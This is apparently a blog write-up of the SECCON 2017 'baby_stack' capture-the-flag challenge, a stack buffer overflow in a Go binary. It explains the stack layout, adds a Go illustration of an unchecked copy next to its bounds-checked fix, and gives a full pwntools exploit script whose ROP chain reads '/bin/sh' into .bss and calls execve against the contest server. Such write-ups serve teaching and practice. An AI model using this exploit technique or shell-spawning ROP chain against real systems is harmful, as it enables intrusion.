[Original][Share] SECCON 2017 baby_stack
2017-12-12 14:44
By the way, please follow my blog: http://bestwing.me

Baby Stack

A simple stack buffer overflow challenge. The program is written in Go, so you cannot just hit F5 in IDA and read decompiled C.
Analysis

The program's main_memcpy contains the vulnerability: it lets us overflow the stack buffer.
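The write-up does not show the Go source of main_memcpy, only that it overruns its stack buffer. As an added illustration that is not the challenge's code, the snippet below models the bug class this implies: a copy through unsafe that trusts the input length, placed next to the bounds-checked version that fixes it. The frame layout (a 16-byte buffer followed by a guard word standing in for whatever the caller relies on) and the 24-byte input are constructed for the demo.

```go
package main

import (
	"errors"
	"fmt"
	"unsafe"
)

// frame is a hypothetical stack-frame layout for illustration only:
// a fixed-size name buffer followed by a value the caller depends on
// (in a real frame, the saved return address or an argument slot).
type frame struct {
	buf   [16]byte
	guard uint64
}

const guardInit = 0x4141414141414141

// uncheckedCopy copies len(src) bytes to the start of f.buf without
// comparing it to len(f.buf): the bug class behind the write-up's
// main_memcpy. Anything past 16 bytes lands on f.guard.
func uncheckedCopy(f *frame, src []byte) {
	// View the memory starting at buf as a large byte array, then slice
	// it to the attacker-chosen length: no bounds check against buf.
	dst := (*[1 << 16]byte)(unsafe.Pointer(&f.buf[0]))[:len(src):len(src)]
	copy(dst, src)
}

var errTooLong = errors.New("input exceeds buffer")

// checkedCopy refuses any input longer than the destination and reports
// the copied length, so truncation can never be silent either.
func checkedCopy(f *frame, src []byte) (int, error) {
	if len(src) > len(f.buf) {
		return 0, errTooLong
	}
	return copy(f.buf[:], src), nil
}

// Demo feeds a constructed 24-byte input to both copies and returns the
// guard word after each, plus the error from the checked version.
func Demo() (uint64, uint64, error) {
	input := make([]byte, 24) // constructed oversized input
	for i := range input {
		input[i] = 'B'
	}
	f1 := frame{guard: guardInit}
	uncheckedCopy(&f1, input) // clobbers guard with 'B' bytes
	f2 := frame{guard: guardInit}
	_, err := checkedCopy(&f2, input) // rejected, guard intact
	return f1.guard, f2.guard, err
}

func main() {
	g1, g2, err := Demo()
	fmt.Printf("unchecked: guard=%#x\nchecked:   guard=%#x err=%v\n", g1, g2, err)
}
```

Running it shows the unchecked guard overwritten with 0x4242424242424242 while the checked copy returns an error and leaves the guard at its initial value; the length comparison is the entire fix.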
While debugging we notice something that differs from the usual C picture. Normally we think of the return address as what rip points to after the call; here it is rsp that matters: at function entry rsp points directly at the return address, and the arguments follow it on the stack (Go passes arguments on the stack).

There is a second problem: if we simply send "A" * 192 + p64(ret), the program crashes. After the call to main_memcpy returns, we see the following instructions:
.text:00000000004012A4 mov rbx, [rsp+1f8h+name.str]
.text:00000000004012AC mov [rsp+1F8h+var_E0], rbx
.text:00000000004012B4 mov rbx, [rsp+1f8h+name.len]
Two stack loads reload the name string pointer and the name length, so these must still be valid after the overflow. We therefore build:
payload = "B" * 104 + p64(0x0000000000599940) + p64(0x200) + "D" * 8
What remains is building the ROP chain. The idea: call read to load "/bin/sh" into a known address in .bss, then call execve on it.
#!/usr/bin/env python
# coding=utf-8
# Author's exploit script (Python 2 / pwntools: payloads are str).
from pwn import *
import sys, time

context.log_level = 'debug'
context.terminal = ['tmux', 'splitw', '-h']
context.binary = "./baby_stack"

if len(sys.argv) == 1:
    p = process(["./baby_stack"])
    pause()
else:
    p = remote("baby_stack.pwn.seccon.jp", 15285)

bss = 0x000000000059f920           # writable scratch area in .bss
syscall = 0x0000000000456889       # syscall; ret;
pop_rax_ret = 0x00000000004016ea   # pop rax; ret;
pop_rsi_ret = 0x000000000046defd   # pop rsi; ret;
pop_rdi_ret = 0x0000000000470931   # pop rdi; or byte ptr [rax + 0x39], cl; ret;
pop_rdx_ret = 0x00000000004a247c   # pop rdx; or byte ptr [rax - 0x77], cl; ret;

p.recvuntil("name >> ")
p.sendline("A" * 0x100)
p.recvuntil("message >> ")
raw_input('---- debug ----')

# Keep the name string pointer and length intact: main reloads both from
# the stack right after main_memcpy returns (the mov instructions above).
payload = "B" * 104 + p64(0x0000000000599940) + p64(0x200) + "D" * 8
payload += "C" * 0x48 + p64(syscall) + p64(0x200)
payload += "E" * (0x80 + 0x40)
# read(0, bss + 0x200, 0x100). rax is set to bss first so the side effect
# `or byte ptr [rax +/- imm], cl` in the pop rdi / pop rdx gadgets writes
# to writable memory instead of faulting.
payload += p64(pop_rax_ret) + p64(bss)
payload += p64(pop_rdi_ret) + p64(0)
payload += p64(pop_rsi_ret) + p64(bss + 0x200)
payload += p64(pop_rdx_ret) + p64(0x100)
payload += p64(pop_rax_ret) + p64(0)     # __NR_read
payload += p64(syscall)
# execve(bss + 0x200, 0, 0) on the "/bin/sh" that read just stored there.
payload += p64(pop_rax_ret) + p64(bss)
payload += p64(pop_rdi_ret) + p64(bss + 0x200)
payload += p64(pop_rsi_ret) + p64(0)
payload += p64(pop_rdx_ret) + p64(0)
payload += p64(pop_rax_ret) + p64(59)    # __NR_execve
payload += p64(syscall)

if len(sys.argv) == 1:
    # Debug breakpoints only make sense against the local process.
    gdb.attach(p, '''break *0x40129F
break *0x401465''')
pause()
p.sendline(payload)
pause()
p.sendline("/bin/sh\x00")
pause()
p.interactive()